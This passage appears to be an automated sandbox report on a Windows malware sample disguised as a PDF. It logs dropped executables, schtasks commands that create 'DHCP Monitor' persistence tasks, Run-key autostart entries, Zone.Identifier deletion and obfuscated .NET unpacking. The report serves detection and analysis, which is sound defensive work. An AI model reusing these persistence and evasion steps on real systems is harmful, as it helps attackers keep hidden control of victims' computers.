Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0037194F AdjustTokenPrivileges,CloseHandle,		2_2_0037194F
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00371F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		2_2_00371F53

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

File created: C:\Users\user\AppData\Local\temp\Folder8_410

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_00394089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

2_2_00394089

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_00385B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

2_2_00385B27

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_0039AFDB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

2_2_0039AFDB

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1880:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5092:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{d95e5ad5-6193-4689-a919-7befded6bfa5}

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Command line argument: sfxname	0_2_00CDDF1E
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Command line argument: sfxstime	0_2_00CDDF1E
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Command line argument: STARTDLG	0_2_00CDDF1E

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

File written: C:\Users\user\AppData\Local\Temp\Folder8_410\laaa.ini

Jump to behavior

Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 026910003102350.pdf.scr.exe

Static file information: File size 1064658 > 1048576

Source: 026910003102350.pdf.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 026910003102350.pdf.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 026910003102350.pdf.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 026910003102350.pdf.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 026910003102350.pdf.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 026910003102350.pdf.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 026910003102350.pdf.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: 026910003102350.pdf.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 026910003102350.pdf.scr.exe
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr

Source: 026910003102350.pdf.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 026910003102350.pdf.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 026910003102350.pdf.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 026910003102350.pdf.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 026910003102350.pdf.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CDF640 push ecx; ret	0_2_00CDF653
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CDEB78 push eax; ret	0_2_00CDEB96
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00360332 push edi; ret	2_2_00360333
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00330E06 push ecx; ret	2_2_00330E19
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0032DBFA push cs; iretd	2_2_0032DBFD
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0032DC00 push eax; iretd	2_2_0032DC01

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_00315D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

2_2_00315D78

PE file contains sections with non-standard names

Source: 026910003102350.pdf.scr.exe

Static PE information: section name: .didat

PE file contains an invalid checksum

Source: itugx.exe.0.dr	Static PE information: real checksum: 0xe50ad should be: 0xe9063
Source: 026910003102350.pdf.scr.exe	Static PE information: real checksum: 0x0 should be: 0x1079dd

File is packed with WinRar

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

File created: C:\Users\user\AppData\Local\Temp\Folder8_410\__tmp_rar_sfx_access_check_5500781

Jump to behavior

Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Drops PE files

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome			Jump to behavior

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs

Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete

Jump to behavior

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.scr

Static PE information: 026910003102350.pdf.scr.exe

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_003A25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		2_2_003A25A0
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0032FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		2_2_0032FC8A

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
